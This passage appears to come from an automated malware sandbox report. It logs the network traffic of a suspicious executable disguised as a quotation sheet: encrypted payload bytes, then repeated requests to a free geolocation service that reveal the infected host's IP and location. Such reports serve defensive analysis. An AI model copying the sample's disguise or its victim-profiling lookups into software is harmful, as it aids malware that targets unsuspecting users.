                                                                              2024-07-24 12:45:26 UTC1255INData Raw: fa ce 7d 33 ac e4 fe 94 15 65 ea 2f 8f 7a f9 ac 62 13 2b 93 20 c2 13 02 d7 09 a3 b9 42 d1 d7 ad 60 62 25 5e 07 84 8d 71 11 ad 63 80 a4 b5 a6 62 1d 2f db 73 ac d2 69 cb 1e 11 9b ff 99 ce 2d e3 e1 b2 fc 09 fe d9 48 d2 2a 7b 99 7b 88 6d ad bb 1f 9e 3b 74 33 d7 d9 07 e3 7f 1a bf 78 64 18 00 35 e7 0b 27 d6 ae 0b 55 3a 7b 92 14 9e 05 21 f5 88 66 28 c8 1e 3b c4 a1 c4 06 ec e6 14 be 1e db 99 1f 8d 07 13 22 2b 76 26 0a 94 ed 96 4a 9d da 89 82 41 1c 80 a8 28 ba 2e c6 cc 25 a2 96 9c bc 0e ca 79 35 29 9d df a9 6b 8a 69 fe 3f ce d8 e6 9f 9c ce 80 a6 a3 25 46 b5 54 ee a0 e3 2c da 8c 82 bf 88 b2 9a 34 9f 50 24 c2 13 de a8 c4 2a 33 dc 80 95 cf b4 71 32 d2 4a ab 32 5a 77 ef c7 c5 dc a2 bc 4d 16 9f fc da 1e 45 e8 75 a5 7b f8 6a af f5 83 5d 67 c7 af dc c0 34 48 c8 a4 0f 94
                                                                              Data Ascii: }3e/zb+ B`b%^qcb/si-H*{{m;t3xd5'U:{!f(;"+v&JA(.%y5)ki?%FT,4P$*3q2J2ZwMEu{j]g4H
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 3b 2c 93 c2 e9 a4 ea c6 0f d8 09 20 14 a9 1e d6 e4 50 32 6f 49 6b c7 71 82 63 b3 f0 22 3d 56 18 39 54 52 ce 0d 6b e0 1f 17 6d b8 33 e9 be 8f 5d 07 5c 74 2d 08 2e 1c 10 e1 1e ab 23 b1 6a cd d3 f0 37 df 86 df 16 c7 bc ba bf 4d cb 4a 8b a5 1f 21 cd f8 f9 b7 2e e4 7e 1d fa a3 28 75 e7 8c 45 d8 b9 b0 69 a3 9d db 64 bc b7 b9 18 ab 9c 34 7b b1 eb b2 3b a6 b9 27 1b a9 16 29 ba bf 7b 7b a2 7e 8d d0 ca 1c 11 2f a9 40 d6 35 b1 58 10 f1 b7 d0 d0 2b ac 8c 8c a1 05 bb 6f d5 80 35 95 63 2e b0 6e c8 15 8f 57 53 cc 08 7b 06 08 28 34 f6 2e 28 6c f6 5f 41 b7 78 82 4f 14 92 aa d1 e1 74 45 c3 c4 ca d4 3b 5c 3e 88 a7 13 96 eb cf 30 88 2e f4 38 f4 b1 97 ef 5b 58 99 6c be c0 9d 1b 4c 55 b7 b7 d1 0f 33 88 86 26 a9 e9 21 8a 17 cf 5c 92 7f a5 49 8a 3e c8 8b 20 17 a5 a9 9d e6 29 81
                                                                              Data Ascii: ;, P2oIkqc"=V9TRkm3]\t-.#j7MJ!.~(uEid4{;'){{~/@5X+o5c.nWS{(4.(l_AxOtE;\>0.8[XlLU3&!\I> )
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 00 fd eb 29 9e 95 af e0 66 2f 40 fa 6d 5d 06 b0 ba 84 54 a6 a3 e5 ed 3b 5d 64 ab a4 75 63 5f 33 bb bb 17 31 93 f6 00 2d 5d d2 df f3 98 45 e9 a1 a8 08 6f f7 8b a3 99 0b d4 7a 63 58 fa 67 af 09 81 f7 1f 3e ab 00 9a e9 b3 79 f5 b7 e3 67 43 e1 19 dd 08 13 80 49 a2 04 c9 df 2a 60 ca 59 20 85 84 c4 8f 1e 2e f7 0c d6 7d 41 37 1c 6d 99 23 19 a3 9a 51 50 94 86 4d cf 1e d1 1d 67 37 eb ad 99 b5 01 d7 f8 ed bc 3d 59 15 74 70 b5 3e 9e 42 4b d4 05 3a b5 3c e7 e1 67 9d ba cd 4e d6 7e a0 55 d6 3c 22 76 57 d4 47 cd c8 32 39 42 71 ac 07 02 a5 c5 e2 bf 78 9b a0 7a 6d 7e 72 64 4e b3 77 11 75 34 31 93 c3 03 83 01 cc e1 ca 76 01 d8 02 75 89 60 4f 8b f2 53 d0 d6 9f 85 d5 e2 84 9b ad 76 07 ba 54 19 3b 49 66 40 57 91 bf 77 6e 87 27 ad c8 21 b7 3d 30 85 f1 e5 93 e2 63 5c 90 9d ec
                                                                              Data Ascii: )f/@m]T;]duc_31-]EozcXg>ygCI*`Y .}A7m#QPMg7=Ytp>BK:<gN~U<"vWG29Bqxzm~rdNwu41vu`OSvT;If@Wwn'!=0c\
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 87 b4 86 e4 95 d5 ba c0 c1 d3 f5 b9 07 19 28 29 69 49 e1 c7 ed 9c 3e 6a da 89 86 2e d8 80 d6 3b ba 3f cf cc 6f b5 96 9c 82 97 9c 79 3f 51 10 36 a8 08 b1 1d ed 06 97 b6 23 9f 81 49 c0 b7 ae 3f ee e3 26 4b bb c6 4a 0a 8a 83 97 49 10 bf 29 15 c4 3c b0 24 6a 8d ac fa 2b d3 fe c0 6d 91 6c ee d2 50 d9 65 ee 52 85 17 0d d0 dc ec ef 3e e0 93 3c 14 2a 24 d7 80 6d 8a af e5 f5 f3 f9 5c b2 be d2 b9 e9 5c c8 b3 91 db 9a cd 6a 7e 8e ae 97 c5 99 c6 55 aa 1f 15 b4 04 6a 38 48 56 52 0e 89 a3 d7 f0 ad 1e a5 d7 79 f4 b1 5b 40 d5 5b 96 93 9c e3 96 b9 b9 1e c4 86 61 90 af 39 69 1b 59 33 24 da 9d db ad b6 a8 40 82 a6 9f cb f4 de 71 39 c1 17 04 ba da cc 09 f9 e8 fa d0 26 e3 7c 9f 7a f8 dc eb 15 67 29 13 da 44 43 df 14 50 24 7b 51 2a ff d1 d1 81 3b 31 58 36 dc a6 e6 3c e3 3e d0
                                                                              Data Ascii: ()iI>j.;?oy?Q6#I?&KJI)<$j+mlPeR><*$m\\j~Uj8HVRy[@[a9iY3$@q9&|zg)DCP${Q*;1X6<>
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 43 af 79 57 ba bf af 67 80 5e 37 b9 a0 79 b9 24 a9 62 85 35 b6 3d 72 f1 b7 f0 dd 22 e5 86 84 2f 6c d4 d2 d5 ac 3f 95 6a d5 d1 6e c8 df 8e 89 5f dc 01 57 01 44 47 35 f7 35 12 65 2a c0 51 92 50 92 4f 14 89 b9 ab f8 5c 16 c7 b6 33 1f bb 28 28 a0 f1 13 96 9f c0 ce 89 20 80 4a 3b b1 e7 f9 67 de f0 6c b4 d7 4b 37 5f 50 ac c0 eb fe 31 f8 91 d5 b6 e9 21 8f 40 86 35 bf 0f b3 65 f4 3a c8 81 30 86 12 ba 9b fd 5d f7 31 15 5d b6 2e 67 3f a5 80 3c f3 da 5f b1 3d 31 fd 8c 8f e1 ed 1e d1 3c ed ad ca 67 5e 38 93 8e 88 ed e9 56 23 9a 38 34 d2 df 08 5d 0e 12 4f 7c a8 d7 a1 e0 72 32 19 42 94 37 01 65 70 de 9c cc 16 53 f2 cd 23 85 a9 cd a7 da d2 b4 88 a6 cf bb 19 c4 94 99 6e f9 38 16 94 95 71 57 41 7c e0 c6 9d 2b 80 53 3e e9 19 13 fb af f3 1b a4 25 bd 21 6a f7 39 e4 40 68 1c
                                                                              Data Ascii: CyWg^7y$b5=r"/l?jn_WDG55e*QPO\3(( J;glK7_P1!@5e:0]1].g?<_=1<g^8V#84]O|r2B7epS#n8qWA|+S>%!j9@h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.11.2049782172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:28 UTC86OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-07-24 12:45:29 UTC695INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvTb9S2nHA520lryzIGtV8v0n4SeLWBq55bpuIkaJfACwcAz2pyy%2FYj4cZ0dnplAG8eqKWR5NeYA8l31Qwn5j5cDrkg8%2BNmVPgEWLlXsyF85nZ3b3sXRPuj%2BTIIZMAOFiTF9Qpuj"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401f00b6f0832-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:29 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.11.2049783172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:29 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:30 UTC709INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FBPI3z2c%2BiBZD7jNGdLayPmetjaI9rp%2Fn6z9c1mOg56LRW2KlLNOIYJ4SX7gUWlhk%2FU3iF8r6x5%2Fi57aoDjOI1MdWJlu%2BGke%2FFMNn8VIxYB4sA8X6Rx4LjBTUbR%2BUsB%2FwPewugx"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401f66c47c999-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:30 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.11.2049784172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:30 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:31 UTC710INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCBLywrrwNOC%2FyLmQ%2FiY6iP%2BWE7ScuY3kXamN3%2B8oPKco6kFMkB8dZz0swYDDehmA7kQ1E%2FVTZm4YX0YGWUivEv3Zfg4NV6QSYimeYfqysVyVsaWSei%2Fht%2B26LNZpSnzqcksFhY4"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401fc9f85241c-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:31 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.11.2049785172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:31 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:31 UTC700INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 2
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L94OMgD8DxOQ4xzdTQeQw%2FqKkfcrDMHkaPjrH%2BM4XnPtnvan2dATAYc2UZ4B92m6bwbYBsBYc6EjpAex2gS9iomVrCG5GGdXAZ21ghiu5FmSBCoaI9XLBcgaKSFRoNMc8q1Z2d05"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a840200dca33913-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:31 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.11.2049786172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:32 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:32 UTC702INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:32 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 3
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1wmbzGDTaq2qIJeELhv2t7tdOV609RlU3%2Fg3kX5npGlnUd4sd8LhchD7HrakhLyhpSGSWNXngGE1Tw04rlDwGq5QsdQAjD9zU7TM%2Fcx9gz8I0lIFFcoWf1dun7cGO21%2BGv8Xed0"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a84020559915716-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:32 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.11.2049787172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:32 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:33 UTC706INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 4
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7VECYW7ccsqINmYIn3mxaa%2F5L5FML5VzqB9x0RLxnYzP1rpwVkv4k%2Frcq5yaE0NjO3%2Fx%2BAyU7XV9T4wzL7XUYbmfGT9lPZtbI%2B4SRabSR5U4f6nK57qTLRKCMoJh5aAovjIlede"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a84020999955848-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:33 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.11.2049788172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:33 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:33 UTC702INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 4
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wYvRB3I7WvGcrPByQJnny7aDoJrwOqnDpxuI3bFyPDN6KXb95Ziu75IK7J9cZlag5t4QDl%2FAuit1Vo0aJbPCb9dDfyu1R%2FsL9Ln01FvDJ2TR9A6HcfGecfyBbCQc6ntrm%2FH1bzC"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a84020dc92b9c43-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:33 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.11.2049789172.67.177.1344435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:34 UTC62OUTGET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:34 UTC706INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:34 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
